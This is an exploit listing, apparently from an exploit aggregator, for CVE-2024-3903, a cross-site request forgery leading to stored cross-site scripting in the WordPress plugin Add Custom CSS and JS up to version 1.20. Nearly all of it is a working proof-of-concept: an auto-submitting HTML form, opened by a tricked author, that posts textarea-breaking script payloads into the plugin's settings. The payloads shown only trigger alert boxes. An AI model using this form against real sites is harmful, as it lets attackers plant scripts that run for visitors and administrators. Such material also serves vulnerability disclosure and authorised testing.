Exploit for Add Custom CSS and JS <= 1.20 - Stored XSS via CSRF CVE-2024-3903

Name: Exploit for Add Custom CSS and JS <= 1.20 - Stored XSS via CSRF CVE-2024-3903
Rating: 5 (72 reviews)

2024-04-18 | CVSS 5.9

## https://sploitus.com/exploit?id=WPEX-ID:0A0E7BD4-948D-47C9-9219-380BDA9F3034
Make an author (or above role) open the following HTML:

<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/options-general.php?page=custom_js_css" method="post">
        <input type="hidden" name="js_adminpanel" value='csrf' />
        <input type="hidden" name="js_frontend" value='</textarea><script>alert("frontend_js")</script>' />
        <input type="hidden" name="js_login" value='</textarea><script><script>alert("login_js")</script>' />
        <input type="hidden" name="css_admin" value='' />
        <input type="hidden" name="css_frontend" value='csrf' />
        <input type="hidden" name="css_login" value='csrf' />
        <input type="submit" name="update" value="Update" />
    </form>
</body>